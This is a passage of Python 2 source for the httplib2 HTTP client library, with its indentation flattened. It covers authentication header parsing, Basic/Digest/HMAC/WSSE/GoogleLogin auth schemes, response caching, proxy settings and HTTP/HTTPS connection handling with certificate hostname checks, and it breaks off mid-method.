# [^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+ matches a "token" as defined by HTTP
# "(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?" matches a "quoted-string" as defined by HTTP, when LWS have already been replaced by a single space
# Actually, as an auth-param value can be either a token or a quoted-string, they are combined in a single pattern which matches both:
# \"?((?<=\")(?:[^\0-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x08\x0A-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?
WWW_AUTH_STRICT = re.compile(r"^(?:\s*(?:,\s*)?([^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+)\s*=\s*\"?((?<=\")(?:[^\0-\x08\x0A-\x1f\x7f-\xff\\\"]|\\[\0-\x7f])*?(?=\")|(?<!\")[^\0-\x1f\x7f-\xff()<>@,;:\\\"/[\]?={} \t]+(?!\"))\"?)(.*)$")
WWW_AUTH_RELAXED = re.compile(r"^(?:\s*(?:,\s*)?([^ \t\r\n=]+)\s*=\s*\"?((?<=\")(?:[^\\\"]|\\.)*?(?=\")|(?<!\")[^ \t\r\n,]+(?!\"))\"?)(.*)$")
UNQUOTE_PAIRS = re.compile(r'\\(.)')
def _parse_www_authenticate(headers, headername='www-authenticate'):
"""Returns a dictionary of dictionaries, one dict
per auth_scheme."""
retval = {}
if headers.has_key(headername):
try:
authenticate = headers[headername].strip()
www_auth = USE_WWW_AUTH_STRICT_PARSING and WWW_AUTH_STRICT or WWW_AUTH_RELAXED
while authenticate:
# Break off the scheme at the beginning of the line
if headername == 'authentication-info':
(auth_scheme, the_rest) = ('digest', authenticate)
else:
(auth_scheme, the_rest) = authenticate.split(" ", 1)
# Now loop over all the key value pairs that come after the scheme,
# being careful not to roll into the next scheme
match = www_auth.search(the_rest)
auth_params = {}
while match:
if match and len(match.groups()) == 3:
(key, value, the_rest) = match.groups()
auth_params[key.lower()] = UNQUOTE_PAIRS.sub(r'\1', value) # '\\'.join([x.replace('\\', '') for x in value.split('\\\\')])
match = www_auth.search(the_rest)
retval[auth_scheme.lower()] = auth_params
authenticate = the_rest.strip()
except ValueError:
raise MalformedHeader("WWW-Authenticate")
return retval
def _entry_disposition(response_headers, request_headers):
"""Determine freshness from the Date, Expires and Cache-Control headers.
We don't handle the following:
1. Cache-Control: max-stale
2. Age: headers are not used in the calculations.
Not that this algorithm is simpler than you might think
because we are operating as a private (non-shared) cache.
This lets us ignore 's-maxage'. We can also ignore
'proxy-invalidate' since we aren't a proxy.
We will never return a stale document as
fresh as a design decision, and thus the non-implementation
of 'max-stale'. This also lets us safely ignore 'must-revalidate'
since we operate as if every server has sent 'must-revalidate'.
Since we are private we get to ignore both 'public' and
'private' parameters. We also ignore 'no-transform' since
we don't do any transformations.
The 'no-store' parameter is handled at a higher level.
So the only Cache-Control parameters we look at are:
no-cache
only-if-cached
max-age
min-fresh
"""
retval = "STALE"
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if request_headers.has_key('pragma') and request_headers['pragma'].lower().find('no-cache') != -1:
retval = "TRANSPARENT"
if 'cache-control' not in request_headers:
request_headers['cache-control'] = 'no-cache'
elif cc.has_key('no-cache'):
retval = "TRANSPARENT"
elif cc_response.has_key('no-cache'):
retval = "STALE"
elif cc.has_key('only-if-cached'):
retval = "FRESH"
elif response_headers.has_key('date'):
date = calendar.timegm(email.Utils.parsedate_tz(response_headers['date']))
now = time.time()
current_age = max(0, now - date)
if cc_response.has_key('max-age'):
try:
freshness_lifetime = int(cc_response['max-age'])
except ValueError:
freshness_lifetime = 0
elif response_headers.has_key('expires'):
expires = email.Utils.parsedate_tz(response_headers['expires'])
if None == expires:
freshness_lifetime = 0
else:
freshness_lifetime = max(0, calendar.timegm(expires) - date)
else:
freshness_lifetime = 0
if cc.has_key('max-age'):
try:
freshness_lifetime = int(cc['max-age'])
except ValueError:
freshness_lifetime = 0
if cc.has_key('min-fresh'):
try:
min_fresh = int(cc['min-fresh'])
except ValueError:
min_fresh = 0
current_age += min_fresh
if freshness_lifetime > current_age:
retval = "FRESH"
return retval
def _decompressContent(response, new_content):
content = new_content
try:
encoding = response.get('content-encoding', None)
if encoding in ['gzip', 'deflate']:
if encoding == 'gzip':
content = gzip.GzipFile(fileobj=StringIO.StringIO(new_content)).read()
if encoding == 'deflate':
content = zlib.decompress(content)
response['content-length'] = str(len(content))
# Record the historical presence of the encoding in a way the won't interfere.
response['-content-encoding'] = response['content-encoding']
del response['content-encoding']
except IOError:
content = ""
raise FailedToDecompressContent(_("Content purported to be compressed with %s but failed to decompress.") % response.get('content-encoding'), response, content)
return content
def _updateCache(request_headers, response_headers, content, cache, cachekey):
if cachekey:
cc = _parse_cache_control(request_headers)
cc_response = _parse_cache_control(response_headers)
if cc.has_key('no-store') or cc_response.has_key('no-store'):
cache.delete(cachekey)
else:
info = email.Message.Message()
for key, value in response_headers.iteritems():
if key not in ['status','content-encoding','transfer-encoding']:
info[key] = value
# Add annotations to the cache to indicate what headers
# are variant for this request.
vary = response_headers.get('vary', None)
if vary:
vary_headers = vary.lower().replace(' ', '').split(',')
for header in vary_headers:
key = '-varied-%s' % header
try:
info[key] = request_headers[header]
except KeyError:
pass
status = response_headers.status
if status == 304:
status = 200
status_header = 'status: %d\r\n' % status
header_str = info.as_string()
header_str = re.sub("\r(?!\n)|(?<!\r)\n", "\r\n", header_str)
text = "".join([status_header, header_str, content])
cache.set(cachekey, text)
def _cnonce():
dig = _md5("%s:%s" % (time.ctime(), ["0123456789"[random.randrange(0, 9)] for i in range(20)])).hexdigest()
return dig[:16]
def _wsse_username_token(cnonce, iso_now, password):
return base64.b64encode(_sha("%s%s%s" % (cnonce, iso_now, password)).digest()).strip()
# For credentials we need two things, first
# a pool of credential to try (not necesarily tied to BAsic, Digest, etc.)
# Then we also need a list of URIs that have already demanded authentication
# That list is tricky since sub-URIs can take the same auth, or the
# auth scheme may change as you descend the tree.
# So we also need each Auth instance to be able to tell us
# how close to the 'top' it is.
class Authentication(object):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
self.path = path
self.host = host
self.credentials = credentials
self.http = http
def depth(self, request_uri):
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return request_uri[len(self.path):].count("/")
def inscope(self, host, request_uri):
# XXX Should we normalize the request_uri?
(scheme, authority, path, query, fragment) = parse_uri(request_uri)
return (host == self.host) and path.startswith(self.path)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header. Over-ride this in sub-classes."""
pass
def response(self, response, content):
"""Gives us a chance to update with new nonces
or such returned from the last authorized response.
Over-rise this in sub-classes if necessary.
Return TRUE is the request is to be retried, for
example Digest may return stale=true.
"""
return False
class BasicAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'Basic ' + base64.b64encode("%s:%s" % self.credentials).strip()
class DigestAuthentication(Authentication):
"""Only do qop='auth' and MD5, since that
is all Apache currently implements"""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['digest']
qop = self.challenge.get('qop', 'auth')
self.challenge['qop'] = ('auth' in [x.strip() for x in qop.split()]) and 'auth' or None
if self.challenge['qop'] is None:
raise UnimplementedDigestAuthOptionError( _("Unsupported value for qop: %s." % qop))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'MD5').upper()
if self.challenge['algorithm'] != 'MD5':
raise UnimplementedDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.A1 = "".join([self.credentials[0], ":", self.challenge['realm'], ":", self.credentials[1]])
self.challenge['nc'] = 1
def request(self, method, request_uri, headers, content, cnonce = None):
"""Modify the request headers"""
H = lambda x: _md5(x).hexdigest()
KD = lambda s, d: H("%s:%s" % (s, d))
A2 = "".join([method, ":", request_uri])
self.challenge['cnonce'] = cnonce or _cnonce()
request_digest = '"%s"' % KD(H(self.A1), "%s:%s:%s:%s:%s" % (
self.challenge['nonce'],
'%08x' % self.challenge['nc'],
self.challenge['cnonce'],
self.challenge['qop'], H(A2)))
headers['authorization'] = 'Digest username="%s", realm="%s", nonce="%s", uri="%s", algorithm=%s, response=%s, qop=%s, nc=%08x, cnonce="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['nonce'],
request_uri,
self.challenge['algorithm'],
request_digest,
self.challenge['qop'],
self.challenge['nc'],
self.challenge['cnonce'])
if self.challenge.get('opaque'):
headers['authorization'] += ', opaque="%s"' % self.challenge['opaque']
self.challenge['nc'] += 1
def response(self, response, content):
if not response.has_key('authentication-info'):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('digest', {})
if 'true' == challenge.get('stale'):
self.challenge['nonce'] = challenge['nonce']
self.challenge['nc'] = 1
return True
else:
updated_challenge = _parse_www_authenticate(response, 'authentication-info').get('digest', {})
if updated_challenge.has_key('nextnonce'):
self.challenge['nonce'] = updated_challenge['nextnonce']
self.challenge['nc'] = 1
return False
class HmacDigestAuthentication(Authentication):
"""Adapted from Robert Sayre's code and DigestAuthentication above."""
__author__ = "Thomas Broyer (t.broyer@ltgt.net)"
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
self.challenge = challenge['hmacdigest']
# TODO: self.challenge['domain']
self.challenge['reason'] = self.challenge.get('reason', 'unauthorized')
if self.challenge['reason'] not in ['unauthorized', 'integrity']:
self.challenge['reason'] = 'unauthorized'
self.challenge['salt'] = self.challenge.get('salt', '')
if not self.challenge.get('snonce'):
raise UnimplementedHmacDigestAuthOptionError( _("The challenge doesn't contain a server nonce, or this one is empty."))
self.challenge['algorithm'] = self.challenge.get('algorithm', 'HMAC-SHA-1')
if self.challenge['algorithm'] not in ['HMAC-SHA-1', 'HMAC-MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for algorithm: %s." % self.challenge['algorithm']))
self.challenge['pw-algorithm'] = self.challenge.get('pw-algorithm', 'SHA-1')
if self.challenge['pw-algorithm'] not in ['SHA-1', 'MD5']:
raise UnimplementedHmacDigestAuthOptionError( _("Unsupported value for pw-algorithm: %s." % self.challenge['pw-algorithm']))
if self.challenge['algorithm'] == 'HMAC-MD5':
self.hashmod = _md5
else:
self.hashmod = _sha
if self.challenge['pw-algorithm'] == 'MD5':
self.pwhashmod = _md5
else:
self.pwhashmod = _sha
self.key = "".join([self.credentials[0], ":",
self.pwhashmod.new("".join([self.credentials[1], self.challenge['salt']])).hexdigest().lower(),
":", self.challenge['realm']])
self.key = self.pwhashmod.new(self.key).hexdigest().lower()
def request(self, method, request_uri, headers, content):
"""Modify the request headers"""
keys = _get_end2end_headers(headers)
keylist = "".join(["%s " % k for k in keys])
headers_val = "".join([headers[k] for k in keys])
created = time.strftime('%Y-%m-%dT%H:%M:%SZ',time.gmtime())
cnonce = _cnonce()
request_digest = "%s:%s:%s:%s:%s" % (method, request_uri, cnonce, self.challenge['snonce'], headers_val)
request_digest = hmac.new(self.key, request_digest, self.hashmod).hexdigest().lower()
headers['authorization'] = 'HMACDigest username="%s", realm="%s", snonce="%s", cnonce="%s", uri="%s", created="%s", response="%s", headers="%s"' % (
self.credentials[0],
self.challenge['realm'],
self.challenge['snonce'],
cnonce,
request_uri,
created,
request_digest,
keylist)
def response(self, response, content):
challenge = _parse_www_authenticate(response, 'www-authenticate').get('hmacdigest', {})
if challenge.get('reason') in ['integrity', 'stale']:
return True
return False
class WsseAuthentication(Authentication):
"""This is thinly tested and should not be relied upon.
At this time there isn't any third party server to test against.
Blogger and TypePad implemented this algorithm at one point
but Blogger has since switched to Basic over HTTPS and
TypePad has implemented it wrong, by never issuing a 401
challenge but instead requiring your client to telepathically know that
their endpoint is expecting WSSE profile="UsernameToken"."""
def __init__(self, credentials, host, request_uri, headers, response, content, http):
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'WSSE profile="UsernameToken"'
iso_now = time.strftime("%Y-%m-%dT%H:%M:%SZ", time.gmtime())
cnonce = _cnonce()
password_digest = _wsse_username_token(cnonce, iso_now, self.credentials[1])
headers['X-WSSE'] = 'UsernameToken Username="%s", PasswordDigest="%s", Nonce="%s", Created="%s"' % (
self.credentials[0],
password_digest,
cnonce,
iso_now)
class GoogleLoginAuthentication(Authentication):
def __init__(self, credentials, host, request_uri, headers, response, content, http):
from urllib import urlencode
Authentication.__init__(self, credentials, host, request_uri, headers, response, content, http)
challenge = _parse_www_authenticate(response, 'www-authenticate')
service = challenge['googlelogin'].get('service', 'xapi')
# Bloggger actually returns the service in the challenge
# For the rest we guess based on the URI
if service == 'xapi' and request_uri.find("calendar") > 0:
service = "cl"
# No point in guessing Base or Spreadsheet
#elif request_uri.find("spreadsheets") > 0:
# service = "wise"
auth = dict(Email=credentials[0], Passwd=credentials[1], service=service, source=headers['user-agent'])
resp, content = self.http.request("https://www.google.com/accounts/ClientLogin", method="POST", body=urlencode(auth), headers={'Content-Type': 'application/x-www-form-urlencoded'})
lines = content.split('\n')
d = dict([tuple(line.split("=", 1)) for line in lines if line])
if resp.status == 403:
self.Auth = ""
else:
self.Auth = d['Auth']
def request(self, method, request_uri, headers, content):
"""Modify the request headers to add the appropriate
Authorization header."""
headers['authorization'] = 'GoogleLogin Auth=' + self.Auth
AUTH_SCHEME_CLASSES = {
"basic": BasicAuthentication,
"wsse": WsseAuthentication,
"digest": DigestAuthentication,
"hmacdigest": HmacDigestAuthentication,
"googlelogin": GoogleLoginAuthentication
}
AUTH_SCHEME_ORDER = ["hmacdigest", "googlelogin", "digest", "wsse", "basic"]
class FileCache(object):
"""Uses a local directory as a store for cached files.
Not really safe to use if multiple threads or processes are going to
be running on the same cache.
"""
def __init__(self, cache, safe=safename): # use safe=lambda x: md5.new(x).hexdigest() for the old behavior
self.cache = cache
self.safe = safe
if not os.path.exists(cache):
os.makedirs(self.cache)
def get(self, key):
retval = None
cacheFullPath = os.path.join(self.cache, self.safe(key))
try:
f = file(cacheFullPath, "rb")
retval = f.read()
f.close()
except IOError:
pass
return retval
def set(self, key, value):
cacheFullPath = os.path.join(self.cache, self.safe(key))
f = file(cacheFullPath, "wb")
f.write(value)
f.close()
def delete(self, key):
cacheFullPath = os.path.join(self.cache, self.safe(key))
if os.path.exists(cacheFullPath):
os.remove(cacheFullPath)
class Credentials(object):
def __init__(self):
self.credentials = []
def add(self, name, password, domain=""):
self.credentials.append((domain.lower(), name, password))
def clear(self):
self.credentials = []
def iter(self, domain):
for (cdomain, name, password) in self.credentials:
if cdomain == "" or domain == cdomain:
yield (name, password)
class KeyCerts(Credentials):
"""Identical to Credentials except that
name/password are mapped to key/cert."""
pass
class AllHosts(object):
pass
class ProxyInfo(object):
"""Collect information required to use a proxy."""
bypass_hosts = ()
def __init__(self, proxy_type, proxy_host, proxy_port,
proxy_rdns=True, proxy_user=None, proxy_pass=None):
"""
Args:
proxy_type: The type of proxy server. This must be set to one of
socks.PROXY_TYPE_XXX constants. For example:
p = ProxyInfo(proxy_type=socks.PROXY_TYPE_HTTP,
proxy_host='localhost', proxy_port=8000)
proxy_host: The hostname or IP address of the proxy server.
proxy_port: The port that the proxy server is running on.
proxy_rdns: If True (default), DNS queries will not be performed
locally, and instead, handed to the proxy to resolve. This is useful
if the network does not allow resolution of non-local names. In
httplib2 0.9 and earlier, this defaulted to False.
proxy_user: The username used to authenticate with the proxy server.
proxy_pass: The password used to authenticate with the proxy server.
"""
self.proxy_type = proxy_type
self.proxy_host = proxy_host
self.proxy_port = proxy_port
self.proxy_rdns = proxy_rdns
self.proxy_user = proxy_user
self.proxy_pass = proxy_pass
def astuple(self):
return (self.proxy_type, self.proxy_host, self.proxy_port,
self.proxy_rdns, self.proxy_user, self.proxy_pass)
def isgood(self):
return (self.proxy_host != None) and (self.proxy_port != None)
def applies_to(self, hostname):
return not self.bypass_host(hostname)
def bypass_host(self, hostname):
"""Has this host been excluded from the proxy config"""
if self.bypass_hosts is AllHosts:
return True
bypass = False
for domain in self.bypass_hosts:
if hostname.endswith(domain):
bypass = True
return bypass
def proxy_info_from_environment(method='http'):
"""
Read proxy info from the environment variables.
"""
if method not in ['http', 'https']:
return
env_var = method + '_proxy'
url = os.environ.get(env_var, os.environ.get(env_var.upper()))
if not url:
return
pi = proxy_info_from_url(url, method)
no_proxy = os.environ.get('no_proxy', os.environ.get('NO_PROXY', ''))
bypass_hosts = []
if no_proxy:
bypass_hosts = no_proxy.split(',')
# special case, no_proxy=* means all hosts bypassed
if no_proxy == '*':
bypass_hosts = AllHosts
pi.bypass_hosts = bypass_hosts
return pi
def proxy_info_from_url(url, method='http'):
"""
Construct a ProxyInfo from a URL (such as http_proxy env var)
"""
url = urlparse.urlparse(url)
username = None
password = None
port = None
if '@' in url[1]:
ident, host_port = url[1].split('@', 1)
if ':' in ident:
username, password = ident.split(':', 1)
else:
password = ident
else:
host_port = url[1]
if ':' in host_port:
host, port = host_port.split(':', 1)
else:
host = host_port
if port:
port = int(port)
else:
port = dict(https=443, http=80)[method]
proxy_type = 3 # socks.PROXY_TYPE_HTTP
return ProxyInfo(
proxy_type = proxy_type,
proxy_host = host,
proxy_port = port,
proxy_user = username or None,
proxy_pass = password or None,
)
class HTTPConnectionWithTimeout(httplib.HTTPConnection):
"""
HTTPConnection subclass that supports timeouts
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, strict=None, timeout=None, proxy_info=None):
httplib.HTTPConnection.__init__(self, host, port, strict)
self.timeout = timeout
self.proxy_info = proxy_info
def connect(self):
"""Connect to the host and port specified in __init__."""
# Mostly verbatim from httplib.py.
if self.proxy_info and socks is None:
raise ProxiesUnavailableError(
'Proxy support missing but proxy use was requested!')
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
host = proxy_host
port = proxy_port
else:
use_proxy = False
host = self.host
port = self.port
for res in socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM):
af, socktype, proto, canonname, sa = res
try:
if use_proxy:
self.sock = socks.socksocket(af, socktype, proto)
self.sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
self.sock = socket.socket(af, socktype, proto)
self.sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
# Different from httplib: support timeouts.
if has_timeout(self.timeout):
self.sock.settimeout(self.timeout)
# End of difference from httplib.
if self.debuglevel > 0:
print "connect: (%s, %s) ************" % (self.host, self.port)
if use_proxy:
print "proxy: %s ************" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
self.sock.connect((self.host, self.port) + sa[2:])
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
class HTTPSConnectionWithTimeout(httplib.HTTPSConnection):
"""
This class allows communication via SSL.
All timeouts are in seconds. If None is passed for timeout then
Python's default timeout for sockets will be used. See for example
the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None,
ca_certs=None, disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict)
self.timeout = timeout
self.proxy_info = proxy_info
if ca_certs is None:
ca_certs = CA_CERTS
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# The following two methods were adapted from https_wrapper.py, released
# with the Google Appengine SDK at
# http://googleappengine.googlecode.com/svn-history/r136/trunk/python/google/appengine/tools/https_wrapper.py
# under the following license:
#
# Copyright 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
def _GetValidHostsForCert(self, cert):
"""Returns a list of valid host globs for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
Returns:
list: A list of valid host globs.
"""
if 'subjectAltName' in cert:
return [x[1] for x in cert['subjectAltName']
if x[0].lower() == 'dns']
else:
return [x[0][1] for x in cert['subject']
if x[0][0].lower() == 'commonname']
def _ValidateCertificateHostname(self, cert, hostname):
"""Validates that a given hostname is valid for an SSL certificate.
Args:
cert: A dictionary representing an SSL certificate.
hostname: The hostname to test.
Returns:
bool: Whether or not the hostname is valid for this certificate.
"""
hosts = self._GetValidHostsForCert(cert)
for host in hosts:
host_re = host.replace('.', '\.').replace('*', '[^.]*')
if re.search('^%s$' % (host_re,), hostname, re.I):
return True
return False
def connect(self):
"Connect to a host on a given (SSL) port."
msg = "getaddrinfo returns an empty list"
if self.proxy_info and self.proxy_info.isgood():
use_proxy = True
proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass = self.proxy_info.astuple()
host = proxy_host
port = proxy_port
else:
use_proxy = False
host = self.host
port = self.port
address_info = socket.getaddrinfo(host, port, 0, socket.SOCK_STREAM)
for family, socktype, proto, canonname, sockaddr in address_info:
try:
if use_proxy:
sock = socks.socksocket(family, socktype, proto)
sock.setproxy(proxy_type, proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass)
else:
sock = socket.socket(family, socktype, proto)
sock.setsockopt(socket.IPPROTO_TCP, socket.TCP_NODELAY, 1)
if has_timeout(self.timeout):
sock.settimeout(self.timeout)
sock.connect((self.host, self.port))
self.sock =_ssl_wrap_socket(
sock, self.key_file, self.cert_file,
self.disable_ssl_certificate_validation, self.ca_certs)
if self.debuglevel > 0:
print "connect: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if not self.disable_ssl_certificate_validation:
cert = self.sock.getpeercert()
hostname = self.host.split(':', 0)[0]
if not self._ValidateCertificateHostname(cert, hostname):
raise CertificateHostnameMismatch(
'Server presented certificate that does not match '
'host %s: %s' % (hostname, cert), hostname, cert)
except ssl_SSLError, e:
if sock:
sock.close()
if self.sock:
self.sock.close()
self.sock = None
# Unfortunately the ssl module doesn't seem to provide any way
# to get at more detailed error information, in particular
# whether the error is due to certificate validation or
# something else (such as SSL protocol mismatch).
if e.errno == ssl.SSL_ERROR_SSL:
raise SSLHandshakeError(e)
else:
raise
except (socket.timeout, socket.gaierror):
raise
except socket.error, msg:
if self.debuglevel > 0:
print "connect fail: (%s, %s)" % (self.host, self.port)
if use_proxy:
print "proxy: %s" % str((proxy_host, proxy_port, proxy_rdns, proxy_user, proxy_pass))
if self.sock:
self.sock.close()
self.sock = None
continue
break
if not self.sock:
raise socket.error, msg
SCHEME_TO_CONNECTION = {
'http': HTTPConnectionWithTimeout,
'https': HTTPSConnectionWithTimeout
}
# Use a different connection object for Google App Engine
try:
try:
from google.appengine.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google.appengine.api.urlfetch import fetch
from google.appengine.api.urlfetch import InvalidURLError
except (ImportError, AttributeError):
from google3.apphosting.api import apiproxy_stub_map
if apiproxy_stub_map.apiproxy.GetStub('urlfetch') is None:
raise ImportError # Bail out; we're not actually running on App Engine.
from google3.apphosting.api.urlfetch import fetch
from google3.apphosting.api.urlfetch import InvalidURLError
def _new_fixed_fetch(validate_certificate):
def fixed_fetch(url, payload=None, method="GET", headers={},
allow_truncated=False, follow_redirects=True,
deadline=None):
if deadline is None:
deadline = socket.getdefaulttimeout() or 5
return fetch(url, payload=payload, method=method, headers=headers,
allow_truncated=allow_truncated,
follow_redirects=follow_redirects, deadline=deadline,
validate_certificate=validate_certificate)
return fixed_fetch
class AppEngineHttpConnection(httplib.HTTPConnection):
"""Use httplib on App Engine, but compensate for its weirdness.
The parameters key_file, cert_file, proxy_info, ca_certs, and
disable_ssl_certificate_validation are all dropped on the ground.
"""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPConnection.__init__(self, host, port=port,
strict=strict, timeout=timeout)
class AppEngineHttpsConnection(httplib.HTTPSConnection):
"""Same as AppEngineHttpConnection, but for HTTPS URIs."""
def __init__(self, host, port=None, key_file=None, cert_file=None,
strict=None, timeout=None, proxy_info=None, ca_certs=None,
disable_ssl_certificate_validation=False):
httplib.HTTPSConnection.__init__(self, host, port=port,
key_file=key_file,
cert_file=cert_file, strict=strict,
timeout=timeout)
self._fetch = _new_fixed_fetch(
not disable_ssl_certificate_validation)
# Update the connection classes to use the Googel App Engine specific ones.
SCHEME_TO_CONNECTION = {
'http': AppEngineHttpConnection,
'https': AppEngineHttpsConnection
}
except (ImportError, AttributeError):
pass
class Http(object):
"""An HTTP client that handles:
- all methods
- caching
- ETags
- compression,
- HTTPS
- Basic
- Digest
- WSSE
and more.
"""
def __init__(self, cache=None, timeout=None,
proxy_info=proxy_info_from_environment,
ca_certs=None, disable_ssl_certificate_validation=False):
"""If 'cache' is a string then it is used as a directory name for
a disk cache. Otherwise it must be an object that supports the
same interface as FileCache.
All timeouts are in seconds. If None is passed for timeout
then Python's default timeout for sockets will be used. See
for example the docs of socket.setdefaulttimeout():
http://docs.python.org/library/socket.html#socket.setdefaulttimeout
`proxy_info` may be:
- a callable that takes the http scheme ('http' or 'https') and
returns a ProxyInfo instance per request. By default, uses
proxy_nfo_from_environment.
- a ProxyInfo instance (static proxy config).
- None (proxy disabled).
ca_certs is the path of a file containing root CA certificates for SSL
server certificate validation. By default, a CA cert file bundled with
httplib2 is used.
If disable_ssl_certificate_validation is true, SSL cert validation will
not be performed.
"""
self.proxy_info = proxy_info
self.ca_certs = ca_certs
self.disable_ssl_certificate_validation = \
disable_ssl_certificate_validation
# Map domain name to an httplib connection
self.connections = {}
# The location of the cache, for now a directory
# where cached responses are held.
if cache and isinstance(cache, basestring):
self.cache = FileCache(cache)
else:
self.cache = cache
# Name/password
self.credentials = Credentials()
# Key/cert
self.certificates = KeyCerts()
# authorization objects
self.authorizations = []
# If set to False then no redirects are followed, even safe ones.
self.follow_redirects = True
# Which HTTP methods do we apply optimistic concurrency to, i.e.
# which methods get an "if-match:" etag header added to them.
self.optimistic_concurrency_methods = ["PUT", "PATCH"]
# If 'follow_redirects' is True, and this is set to True then
# all redirecs are followed, including unsafe ones.
self.follow_all_redirects = False
self.ignore_etag = False
self.force_exception_to_status_code = False
self.timeout = timeout
# Keep Authorization: headers on a redirect.
self.forward_authorization_headers = False
def __getstate__(self):
state_dict = copy.copy(self.__dict__)
# In case request is augmented by some foreign object such as
# credentials which handle auth
if 'request' in state_dict:
del state_dict['request']
if 'connections' in state_dict:
del state_dict['connections']
return state_dict
def __setstate__(self, state):
self.__dict__.update(state)
self.connections = {}
def _auth_from_challenge(self, host, request_uri, headers, response, content):
"""A generator that creates Authorization objects
that can be applied to requests.
"""
challenges = _parse_www_authenticate(response, 'www-authenticate')
for cred in self.credentials.iter(host):
for scheme in AUTH_SCHEME_ORDER:
if challenges.has_key(scheme):
yield AUTH_SCHEME_CLASSES[scheme](cred, host, request_uri, headers, response, content, self)
def add_credentials(self, name, password, domain=""):
"""Add a name and password that will be used
any time a request requires authentication."""
self.credentials.add(name, password, domain)
def add_certificate(self, key, cert, domain):
"""Add a key and cert that will be used
any time a request requires authentication."""
self.certificates.add(key, cert, domain)
def clear_credentials(self):
"""Remove all the names and passwords
that are used for authentication"""
self.credentials.clear()
self.authorizations = []
def _conn_request(self, conn, request_uri, method, body, headers):
i = 0
seen_bad_status_line = False
while i < RETRIES:
i += 1
try:
if hasattr(conn, 'sock') and conn.sock is None:
conn.connect()
conn.request(method, request_uri, body, headers)
except socket.timeout:
raise
except socket.gaierror:
conn.close()
raise ServerNotFoundError("Unable to find the server at %s" % conn.host)
except ssl_SSLError:
conn.close()
raise
except socket.error, e:
err = 0
if hasattr(e, 'args'):
err = getattr(e, 'args')[0]
else:
err = e.errno
if err in (errno.ENETUNREACH, errno.EADDRNOTAVAIL) and i < RETRIES:
continue # retry on potentially transient socket errors
raise
except httplib.HTTPException:
# Just because the server closed the connection doesn't apparently mean
# that the server didn't send a response.
if hasattr(conn, 'sock') and conn.sock is None:
if i < RETRIES-1:
conn.close()
conn.connect()
continue
else:
conn.close()
raise
if i < RETRIES-1:
conn.close()
conn.connect()
continue
try:
response = conn.getresponse()
except httplib.BadStatusLine:
# If we get a BadStatusLine on the first try then that means
# the connection just went stale, so retry regardless of the
# number of RETRIES set.
if not seen_bad_status_line and i == 1:
i = 0
seen_bad_status_line = True
conn.close()
